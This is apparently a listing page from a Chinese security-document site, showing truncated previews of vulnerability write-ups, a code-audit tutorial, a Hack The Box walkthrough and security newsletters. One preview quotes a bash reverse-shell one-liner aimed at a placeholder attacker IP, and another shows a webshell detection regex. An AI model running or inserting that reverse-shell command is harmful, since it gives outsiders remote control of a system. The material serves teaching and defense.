爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

挖洞经验 | Facebook系统HTML转PDF文档可能引起的RCE漏洞

# Facebook系统HTML转PDF文档RCE漏洞分析 ## 漏洞概述本漏洞存在于Facebook旗下Workplace by Facebook服务的法律协议签署系统中，攻击者能够通过HTML注入在服务端实现远程代码执行(RCE)。漏洞核心在于HTML转PDF过程中对用户输入处理不当，结合邮件伪造漏洞可形成完整的攻击链。 ## 漏洞细节 ### 1. 漏洞入口 - 当用户创建Workplace by Facebook账号时，会收到来自`legal_noreply@fb.com`的

2025-08-16 11:28:43

Java代码审计入门篇：WebGoat 8（初见）

# WebGoat 8 Java代码审计教学文档 ## 1. WebGoat 8简介 WebGoat 8是基于Spring Boot框架开发的故意不安全的Web应用程序，用于教授Web应用程序安全性课程。它演示了常见的服务器端应用程序缺陷。 ## 2. 环境准备 ### 2.1 系统要求 - Java 11（必须，Java 8编译失败） - Maven > 3.2.1 - IDEA（推荐） ### 2.2 项目获取与编译 ```bash git clone https://github

2025-08-16 11:28:04

利用PHP的字符串解析特性Bypass

# PHP字符串解析特性绕过WAF/IDS技术分析 ## 一、PHP查询字符串解析机制 PHP在处理查询字符串(URL或POST数据)时会自动将其转换为`$_GET`或`$_POST`关联数组，此过程存在特殊字符处理机制： 1. **字符转换规则**： - 删除空白符 - 将某些特殊字符转换为下划线(包括空格) - 示例转换表： | 用户输入 | PHP变量名 | |---------|----------| | %20foo_bar%00 | foo

2025-08-16 11:26:29

专注Web及移动安全[红日安全100期]

# 红日安全Web及移动安全教学文档 ## 一、安全动态与漏洞分析 ### 1.1 近期重大安全事件 - **PHPStudy后门事件**： - 后门利用复现方法 - 批量检测Py脚本开发要点 - BurpSuite专用检测插件使用 - 技术分析：后门通过特定HTTP头触发，执行任意命令 - **vBulletin 5.x远程代码执行漏洞**： - 影响版本：5.x全系列 - 漏洞原理：未授权RCE - 修复建议：立即升级到最新版本 - **CVE-2019-

2025-08-16 11:25:36

浅述机器学习在源代码分析上的应用

# 机器学习在源代码分析中的应用教学文档 ## 一、背景介绍源代码分析是信息安全领域的重要组成部分，特别是在恶意代码检测方面。随着机器学习技术的发展，其在源代码分析领域的应用日益广泛。本教学文档将系统介绍机器学习在源代码分析中的各种应用方法。 ## 二、传统源代码分析方法 ### 1. 正则表达式匹配 - 通过编写特定规则模式检测恶意代码 - 示例规则： ```regex '(array_map[\s\n]{0,20}\(.{1,5}(eval|assert|ass\\x65r

2025-08-16 11:24:51

SecWiki周刊（第291期）

# SecWiki周刊（第291期）安全技术教学文档 ## 一、新闻与政策动态 ### 1. 网络安全行政执法案例 - **江苏网警第六批典型案例**：展示了网络安全执法实践，包括违法案例类型和处理方式 - **关键点**：了解当前网络安全执法重点方向 ### 2. 产业发展规划 - **工信部网络安全产业目标**：2025年产业规模超过2000亿 - **关键点**：国家层面对网络安全产业的重视和发展预期 ## 二、恶意软件分析技术 ### 1. PHPStudy后门分析 - **分

2025-08-16 11:23:57

挖洞经验 | 通过Shodan发现目标应用Marathon服务的RCE漏洞

# Marathon服务未授权访问导致RCE漏洞分析报告 ## 漏洞概述本报告详细分析了一个通过Shodan发现的Marathon服务未授权访问漏洞，该漏洞可导致远程代码执行(RCE)。Marathon是一个生产级别的容器编排平台，用于管理Apache Mesos集群中的容器化应用。 ### 漏洞关键点 - **漏洞类型**：未授权访问 + 远程代码执行 - **影响组件**：Marathon服务（Apache Mesos生态的一部分） - **漏洞等级**：高危 - **利用条件**：

2025-08-16 11:12:51

利用基于AngularJS的XSS实现提权

# 基于AngularJS的XSS提权技术详解 ## 漏洞背景本文介绍了一种利用AngularJS模板注入实现XSS攻击，并最终提升用户权限的技术。该漏洞存在于一个用户配置文件页面，允许攻击者通过精心构造的payload将普通用户权限提升为管理员权限。 ## 漏洞发现过程 ### 初始测试 1. 目标页面：用户配置文件页面（如`https://www.site.com/users/username-here`） 2. 常规XSS测试payload（如`">`）被过滤，说明应用有基本的X

2025-08-16 11:12:05

Hack the box靶机实战：Bastion

# Hack the Box靶机实战：Bastion渗透测试报告 ## 目标概述 - 目标IP：10.10.10.134 (Windows系统) - 攻击机IP：10.10.16.65 (Kali Linux) - 难度评估：中等难度Windows靶机 ## 初始信息收集 ### 端口扫描使用Nmap进行快速端口扫描： ```bash nmap -sT -p- --min-rate 10000 -oN ports 10.10.10.134 ``` **开放端口**： - 22/tcp

2025-08-16 11:10:49

SecWiki周刊（第292期）

# 网络安全技术周刊（第292期）教学文档 ## 一、移动安全 ### 反弹shell的学习总结 - Part 1 - **概念**：反弹shell是一种攻击技术，使目标主机主动连接攻击者控制的服务器 - **实现方式**： - 使用netcat、bash、python等工具建立反向连接 - 常用命令示例：`bash -i >& /dev/tcp/攻击者IP/端口 0>&1` - **防御措施**： - 限制出站连接 - 监控异常网络流量 - 使用防火墙规则限制不必要的出

2025-08-16 11:09:26

挖洞经验 | 综合利用SlickQuiz两个0-Day漏洞接管Uber的WordPress网站

# SlickQuiz插件漏洞分析与利用教学文档 ## 漏洞概述本教学文档详细分析WordPress插件SlickQuiz存在的两个0-day漏洞：存储型XSS(CVE-2019-12517)和SQL注入(CVE-2019-12516)，以及如何综合利用这两个漏洞实现从普通用户到WordPress管理员权限的提升。 ## 漏洞1：存储型XSS (CVE-2019-12517) ### 漏洞位置 `php/slickquiz-scores.php`文件中的`generate_score_

2025-08-16 11:08:21

渗透测试第二阶段：信息收集方法原理经验心得

# 渗透测试信息收集方法详解 ## 一、信息收集概述信息收集是渗透测试的第二阶段，也是至关重要的一环。通过全面收集目标系统的相关信息，能够直接影响后续渗透测试的效果和成功率。 ### 1.1 信息收集分类 - **主动收集**：通过技术手段直接侦察目标，可能被目标系统记录 - 示例：使用扫描工具探测目标端口 - 特点：准确性高，但可能触发安全警报 - **被动收集**：收集目标遗留的信息，目标无法感知 - 示例：从公开渠道收集目标员工信息 - 特点：隐蔽性强，但信息可

2025-08-16 11:07:19

跳转到页